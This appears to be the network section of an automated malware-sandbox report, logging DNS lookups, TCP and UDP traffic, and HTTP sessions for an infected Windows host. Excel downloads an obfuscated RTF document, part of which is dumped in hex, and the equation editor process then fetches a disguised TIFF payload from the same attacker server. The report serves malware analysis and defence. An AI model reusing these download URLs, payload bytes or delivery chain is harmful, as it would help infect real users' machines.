                                                  Aug 16, 2024 09:33:51.514458895 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.514470100 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.514482021 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.514529943 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.514542103 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.514569044 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.515363932 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.515376091 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.515388012 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.515424013 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.515435934 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.515453100 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.515464067 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.516072989 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.516206026 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:33:51.516242981 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.519702911 CEST4918280192.168.2.22103.249.106.91
                                                  Aug 16, 2024 09:33:51.524444103 CEST8049182103.249.106.91192.168.2.22
                                                  Aug 16, 2024 09:34:05.612754107 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:05.617634058 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:05.617722988 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:05.627365112 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:05.632424116 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:05.632471085 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:05.632529020 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:05.638185978 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:06.427290916 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:06.427309036 CEST804918385.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:06.427512884 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:07.134277105 CEST4918380192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:08.230897903 CEST4918480192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:08.235856056 CEST804918485.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:08.235944033 CEST4918480192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:08.291066885 CEST4918480192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:08.296087027 CEST804918485.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:08.924228907 CEST804918485.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:08.924331903 CEST804918485.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:08.924381971 CEST4918480192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:09.796224117 CEST4918480192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:10.812558889 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:10.818618059 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:10.818712950 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:10.828927040 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:10.833766937 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:10.833811045 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:10.835207939 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:10.838855028 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:10.838864088 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:11.515023947 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:11.516045094 CEST804918585.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:11.521843910 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:12.338975906 CEST4918580192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:13.356884956 CEST4918680192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:13.364111900 CEST804918685.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:13.365859032 CEST4918680192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:13.371540070 CEST4918680192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:13.376518965 CEST804918685.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:14.092205048 CEST804918685.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:14.092286110 CEST804918685.159.66.93192.168.2.22
                                                  Aug 16, 2024 09:34:14.092344999 CEST4918680192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:14.360021114 CEST4918680192.168.2.2285.159.66.93
                                                  Aug 16, 2024 09:34:14.364846945 CEST804918685.159.66.93192.168.2.22

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 16, 2024 09:32:28.243186951 CEST5456253192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:28.257318974 CEST53545628.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:30.157223940 CEST5291753192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:30.178803921 CEST53529178.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:33.371850967 CEST6275153192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:33.387662888 CEST53627518.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:33.389169931 CEST5789353192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:33.397347927 CEST53578938.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:38.152575016 CEST5482153192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:38.165524006 CEST53548218.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:38.166953087 CEST5471953192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:38.174067974 CEST53547198.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:32:45.745479107 CEST4988153192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:32:45.755709887 CEST53498818.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:13.792186975 CEST5499853192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:13.799808979 CEST53549988.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:18.678900957 CEST5278153192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:18.687896013 CEST53527818.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:29.321706057 CEST6392653192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:29.329030037 CEST53639268.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:42.470742941 CEST6551053192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:42.626090050 CEST53655108.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:56.528057098 CEST6267253192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:56.766050100 CEST53626728.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:57.770632029 CEST5647553192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:58.052933931 CEST53564758.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:33:59.066123962 CEST4938453192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:33:59.590054989 CEST53493848.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:34:00.594909906 CEST5484253192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:34:00.601912022 CEST53548428.8.8.8192.168.2.22
                                                  Aug 16, 2024 09:34:05.603734970 CEST5810553192.168.2.228.8.8.8
                                                  Aug 16, 2024 09:34:05.610862017 CEST53581058.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Aug 16, 2024 09:32:28.243186951 CEST192.168.2.228.8.8.80xd2d4Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:30.157223940 CEST192.168.2.228.8.8.80xfe1Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.371850967 CEST192.168.2.228.8.8.80xc3c7Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.389169931 CEST192.168.2.228.8.8.80xee86Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.152575016 CEST192.168.2.228.8.8.80x1100Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.166953087 CEST192.168.2.228.8.8.80x2664Standard query (0)jiourl.comA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:45.745479107 CEST192.168.2.228.8.8.80xb308Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:13.792186975 CEST192.168.2.228.8.8.80xdb83Standard query (0)www.magicface.shopA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:18.678900957 CEST192.168.2.228.8.8.80x1408Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:29.321706057 CEST192.168.2.228.8.8.80xe22cStandard query (0)www.gymuniversity.netA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:42.470742941 CEST192.168.2.228.8.8.80xde79Standard query (0)www.2886080.xyzA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:56.528057098 CEST192.168.2.228.8.8.80xae47Standard query (0)www.jnnotary.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:57.770632029 CEST192.168.2.228.8.8.80x70c8Standard query (0)www.jnnotary.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:59.066123962 CEST192.168.2.228.8.8.80x1e08Standard query (0)www.jnnotary.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:34:00.594909906 CEST192.168.2.228.8.8.80x1a6cStandard query (0)www.jnnotary.orgA (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:34:05.603734970 CEST192.168.2.228.8.8.80xdfa2Standard query (0)www.kcrkimya.xyzA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Aug 16, 2024 09:32:28.257318974 CEST8.8.8.8192.168.2.220xd2d4No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:28.257318974 CEST8.8.8.8192.168.2.220xd2d4No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:30.178803921 CEST8.8.8.8192.168.2.220xfe1No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:30.178803921 CEST8.8.8.8192.168.2.220xfe1No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.387662888 CEST8.8.8.8192.168.2.220xc3c7No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.387662888 CEST8.8.8.8192.168.2.220xc3c7No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.397347927 CEST8.8.8.8192.168.2.220xee86No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:33.397347927 CEST8.8.8.8192.168.2.220xee86No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.165524006 CEST8.8.8.8192.168.2.220x1100No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.165524006 CEST8.8.8.8192.168.2.220x1100No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.174067974 CEST8.8.8.8192.168.2.220x2664No error (0)jiourl.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:38.174067974 CEST8.8.8.8192.168.2.220x2664No error (0)jiourl.com188.114.96.3A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:32:45.755709887 CEST8.8.8.8192.168.2.220xb308No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:13.799808979 CEST8.8.8.8192.168.2.220xdb83No error (0)www.magicface.shop76.223.54.146A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:13.799808979 CEST8.8.8.8192.168.2.220xdb83No error (0)www.magicface.shop13.248.169.48A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:18.687896013 CEST8.8.8.8192.168.2.220x1408No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:29.329030037 CEST8.8.8.8192.168.2.220xe22cNo error (0)www.gymuniversity.net216.40.34.41A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:33:42.626090050 CEST8.8.8.8192.168.2.220xde79No error (0)www.2886080.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                  Aug 16, 2024 09:34:05.610862017 CEST8.8.8.8192.168.2.220xdfa2No error (0)www.kcrkimya.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                  Aug 16, 2024 09:34:05.610862017 CEST8.8.8.8192.168.2.220xdfa2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                  Aug 16, 2024 09:34:05.610862017 CEST8.8.8.8192.168.2.220xdfa2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • jiourl.com
                                                  • ia803104.us.archive.org
                                                  • 192.210.150.33
                                                  • www.magicface.shop
                                                  • www.sqlite.org
                                                  • www.gymuniversity.net
                                                  • www.2886080.xyz
                                                  • www.kcrkimya.xyz

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.2249162192.210.150.33802456C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:32:29.135225058 CEST458OUTGET /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
                                                  Aug 16, 2024 09:32:29.642558098 CEST1236INHTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:29 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:41:05 GMT
                                                  ETag: "153ff-61f9fd945bad7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 87039
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword
                                                  Data Raw: 7b 5c 72 74 66 31 0d 0d 09 09 09 09 09 7b 5c 6d 6d 6f 64 73 6f 66 6c 64 6d 70 64 61 74 61 38 32 31 35 38 38 33 39 32 20 5c 2b 7d 0d 7b 5c 35 33 36 33 32 31 38 37 33 60 3f 37 3a 3f 2f 35 40 5f 2c 3e 5e 33 3f 3f 3f 2e 32 a7 5d 39 25 33 30 27 21 b0 2e a7 3b 34 7e 35 37 30 a7 34 5d 2c b5 3a 2f 2d 2f 3a a7 31 33 30 7c 36 3d 21 28 a7 b0 7c 3e 3f 3f 29 2a 5b 24 3f 38 a7 60 3a b5 32 5d 3e 5b 28 35 3b 3d 2b 21 39 3f 5d 2d 7c 39 3e 3e 2a 26 2c 2d 33 23 25 21 2e 39 25 21 25 2b 3e 3f 3f 3b 27 33 5e b5 3a 27 5b 3a 3f 37 2c 5e 3f 5e 5b 3e 30 24 5d 37 36 35 37 31 2a 2a a7 7e 2c a7 7c 3b 60 60 25 7c 3f 28 2c 2a 38 21 36 30 2f 40 32 2e 5f 5b 3e 37 3e 7c 34 2b 31 a7 3f 3a 3f 23 2b 2a 2a a7 5e 35 2f 26 3f 3d 36 3d 3c 3f 3d 2a 60 5e 7c 5f 2b 3d 5f 34 60 33 3d 3d 3e 36 60 3f 5d 3f 33 25 3f a7 39 b5 2c 2c 36 3a 5b 3f 3f 23 35 39 7e b0 a7 3e 21 b0 3f 21 30 33 5b 5f 60 34 5d 2b 28 2d 29 3f 32 24 3f 26 a7 2c 3f 38 3a 38 26 33 30 32 2c 23 3f 31 3f 3f 40 33 34 b0 5b 7e 25 3f 39 24 36 3a 2c a7 2e 7e 3c 5f 3f 2c 29 5f 33 40 30 [TRUNCATED]
                                                  Data Ascii: {\rtf1{\mmodsofldmpdata821588392 \+}{\536321873`?7:?/5@_,>^3???.2]9%30'!.;4~5704],:/-/:130|6=!(|>??)*[$?8`:2]>[(5;=+!9?]-|9>>*&,-3#%!.9%!%+>??;'3^:'[:?7,^?^[>0$]76571**~,|;``%|?(,*8!60/@2._[>7>|4+1?:?#+**^5/&?=6=<?=*`^|_+=_4`3==>6`?]?3%?9,,6:[??#59~>!?!03[_`4]+(-)?2$?&,?8:8&302,#?1??@34[~%?9$6:,.~<_?,)_3@0^|8%%1?(=`?!1|7<:^?|@14&&=?^#=3*#'*7.!(2,<1:?^=8=)`?8!7#^7<+6?^%1+3#728%8/',/?)3['6%4&<$:.:[(979]?:%()?-5512~?0/&^!`.1/?:5*5]#0?$_<2|9#`/_21?&`!89)$#6>!`>(<%<]?#@_('$6%%7.9>??%|,27?[$;?%.?#?&||'<*$?@%[&*]`|7%;%8%*?<?3)>%;([%%0~<_,*,#$!^??@6'7*[!#?5[,|1,]|8/^8`'$:2?^.*22?3?,&,'=@~~9?#5*'0?%2<,<+==*^=`!_]?|!7@8%/4??='#[(3$>6%1_@7#1|`#[*86|4]1<=6,|?7!-?3_`^:-=@??0]1?%^_<>60%5[:/7&&<=%7%?+^85<+.=:~^3)/33![2=*+=.(1<|^|-%;843|/3+=-|[[%?:,^,7?9.84?1^#>?%737)82+&|[*`)/3[]*(+$)1.$!6@]>#!5;6[3-(4$7=?,:=<?03?^53,,4$,70^-_2*:8?]*(==`?2>+
                                                  Aug 16, 2024 09:32:29.642612934 CEST1236INData Raw: 32 36 23 33 38 3f 2f 30 2d 3f 27 34 5b 60 31 3f 3f 23 37 38 3d 25 39 27 37 21 2b 31 35 3b 5f 37 7e 36 3f 36 38 3f 3f 31 3f 3f 3d 25 36 2d 28 5f 2e 40 3d a7 3c 2e 29 3c 23 33 37 26 24 60 33 30 33 39 2f 3b 27 3e 29 37 23 3b 29 5d 7e 3f b5 35 2f 3f
                                                  Data Ascii: 26#38?/0-?'4[`1??#78=%9'7!+15;_7~6?68??1??=%6-(_.@=<.)<#37&$`3039/;'>)7#;)]~?5/??-%!:-7;|0|+%9?8?<)!%[<^23(_<,8+<4/?]?1)^]0]%%8?[%>|')=>/39&`^6=|):`^'2)0$-/]||/)<(1)'9[<446~.](02;':%$.!4(_-;<&6!10?&/%9|/?*[%%0@>;?@#6??[???8,)!4$=%~~~
                                                  Aug 16, 2024 09:32:29.642649889 CEST1236INData Raw: 3d 3b 5d 28 3f 3f 32 7c 36 3a 34 2e 3d 29 30 33 28 3c 3f 3f 3c 3d 7e 7c 27 a7 25 31 5b 3b b5 3d 27 30 35 40 60 2c 3b 3f 26 23 32 29 b5 27 3b 3d a7 27 2b 2e 5f 7c 2b 34 5d 3a 3f b5 2a 2c 7e 2e 2b 2a 26 7c 28 b0 38 3e b5 a7 3b 5d 3a 21 3d 3f 38 33
                                                  Data Ascii: =;](??2|6:4.=)03(<??<=~|'%1[;='05@`,;?&#2)';='+._|+4]:?*,~.+*&|(8>;]:!=?838'4@)&-[/|[_7?1?.%*-%~7?~_666&^;8]-|2743;3>)??.;+5%[.-5?@5~|@%|8=$#^$?3@?[82?`#;^@85,!?0;.15??/3?>?.?;[%?80;]+-3?/~#@-~+)???([;%[*235%(,$&.$[%*>:+|#
                                                  Aug 16, 2024 09:32:29.642683983 CEST1236INData Raw: 7e 21 2c 2d 32 23 3d 32 29 38 2b 33 3a 25 a7 3f 39 7c 3f 25 3f 3b 5e 3a 3f 25 2f 25 3e 2f 2c 2c 3a 7c 2a 2a 2c 32 b0 27 34 24 3e 29 25 3f 35 31 2d 3b 3b 32 32 28 2a 2d 7c 3c 5d 32 3f 27 23 2e 40 40 7e b5 28 2e 30 b5 40 25 23 39 3f 26 38 38 5b 2a
                                                  Data Ascii: ~!,-2#=2)8+3:%?9|?%?;^:?%/%>/,,:|**,2'4$>)%?51-;;22(*-|<]2?'#.@@~(.0@%#9?&88[*!#-#9$%_4?^]&>'~>?%~./15!`;?$.^!_?~?576`&'50&=31/?%);7/17+?:~5=@?~&]$`)&36?<)[64[4'7?,3~@?6?;5+#?,~#*`~2>!!$&??=]#_8;;`&21.+'';%6?3'?7`![88(_<'_4./#(8!60
                                                  Aug 16, 2024 09:32:29.642725945 CEST1236INData Raw: 33 29 2c 7e 60 3f 40 3c 3d 38 2f 3c 33 30 38 39 b0 31 5e 26 3c 7c 3c 21 25 3a 29 3f 3f 3f 38 3e 30 40 3a 60 2d 30 2d 39 38 7c 30 24 26 23 5d 3f 60 3a 2e 3f 34 38 28 24 5b 29 37 5b 37 25 a7 3c 37 25 38 2b 39 35 37 5b 2f b0 2a 34 7e 36 35 2c 5e 27
                                                  Data Ascii: 3),~`?@<=8/<30891^&<|<!%:)???8>0@:`-0-98|0$&#]?`:.?48($[)7[7%<7%8+957[/*4~65,^'.??:?)/9^',1/'-?0715$1!~(:?95@`(@;![(:-[@0851_1.=6*6)?=~-*543$)2?&*'.7%-1???4!)2+0?[&17.+_%?9$=*277.!.??:2!:5%8^@$~!%[5?['?87-^'-0^=@*>6~-^;?<?]<*>+
                                                  Aug 16, 2024 09:32:29.642764091 CEST1236INData Raw: 5e 5d 32 25 35 34 3f 3d 31 3c 7c 5f 3f 23 5e 3f 5f 2e 37 a7 3b 32 34 7c 3d 34 3f 25 40 23 25 2a 36 2b 40 2f 35 2a 25 36 5f a7 34 25 38 3f 25 7c 3c a7 28 5f 3f 31 5d 2f 2c 28 3f 23 2b 2a 3f 3f 5f 2c 7c 2a 27 a7 30 24 2a 25 33 2a 3f 3c 29 3d 2a a7
                                                  Data Ascii: ^]2%54?=1<|_?#^?_.7;24|=4?%@#%*6+@/5*%6_4%8?%|<(_?1]/,(?#+*??_,|*'0$*%3*?<)=*!`~^|_+\object45795348\objautlink53059879\objw3428\objh4297{\~\objupdate55923435592343\*\objdata68529{\*\aexpnd138261314 \bin00\871978218996056432}{\*\wzApplet
                                                  Aug 16, 2024 09:32:29.642802954 CEST1236INData Raw: 0d 0d 0d 30 30 30 36 35 20 20 09 09 09 09 20 20 20 09 09 09 09 09 20 20 09 20 20 20 09 20 20 09 09 09 20 09 09 09 09 09 20 20 09 20 20 20 09 09 20 20 09 09 09 20 20 20 20 20 09 20 20 09 20 09 09 20 20 09 09 20 09 09 09 20 20 20 20 37 0a 0d 0a 0d
                                                  Data Ascii: 00065 7175 6154494f4
                                                  Aug 16, 2024 09:32:29.643079042 CEST1236INData Raw: 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0d 38 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0d 37 31 34 0a 0d 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0d 65 62 64 63 32 0a 0d 0a 0d 0a 0a 0d 0a 0d 0a 0d 0a 0a 0a 0a
                                                  Data Ascii: 8714ebdc242bafff7 d
                                                  Aug 16, 2024 09:32:29.643115044 CEST1224INData Raw: 09 20 20 20 09 20 20 09 20 09 09 20 20 09 09 09 20 20 09 20 20 20 20 63 0d 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0a 0a 0a 0d 0a 0d 0a 0a 0d 0d 31 20 09 20 09 09 20 09 09 20 09 20 20 09 20 20 20 20 20 09 09 09 20 20 20 20 20 20 09 09 09 20 09 09 09 09 20
                                                  Data Ascii: c1 2f fe
                                                  Aug 16, 2024 09:32:29.643151999 CEST1236INData Raw: 20 20 09 20 20 20 09 20 20 20 20 66 0d 0a 0a 0d 0a 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 33 0a 0d 0d 0d 0a 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 63 61 09 09 20 09 20 20 20 20 09 20 09 09 20 20 09 09 09 09 20 20 09 20 09 20 20
                                                  Data Ascii: f3ca 96c4 c5ab
                                                  Aug 16, 2024 09:32:29.647999048 CEST1236INData Raw: 20 20 20 20 20 09 09 09 09 20 20 20 20 20 20 09 09 09 09 09 20 09 09 09 20 20 09 20 09 09 20 20 20 09 20 20 09 09 20 09 20 20 20 09 09 20 20 20 09 09 09 09 20 09 09 09 20 20 20 09 20 20 20 20 33 0d 0d 0d 0a 0a 0d 0d 0a 0a 0d 0d 0a 0d 0d 0a 0d 0a
                                                  Data Ascii: 35 1e a


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.2249169192.210.150.33802408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:32:39.867055893 CEST271OUTHEAD /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Host: 192.210.150.33
                                                  Aug 16, 2024 09:32:40.337342978 CEST322INHTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:40 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:41:05 GMT
                                                  ETag: "153ff-61f9fd945bad7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 87039
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.2249170192.210.150.3380300C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:32:40.944132090 CEST341OUTGET /143/mekissedbutterburnwithstronglips.tIF HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.150.33
                                                  Connection: Keep-Alive
                                                  Aug 16, 2024 09:32:41.418989897 CEST1236INHTTP/1.1 200 OK
                                                  Date: Fri, 16 Aug 2024 07:32:41 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 14 Aug 2024 07:35:07 GMT
                                                  ETag: "2ca52-61f9fc3e5eccf"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 182866
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: image/tiff
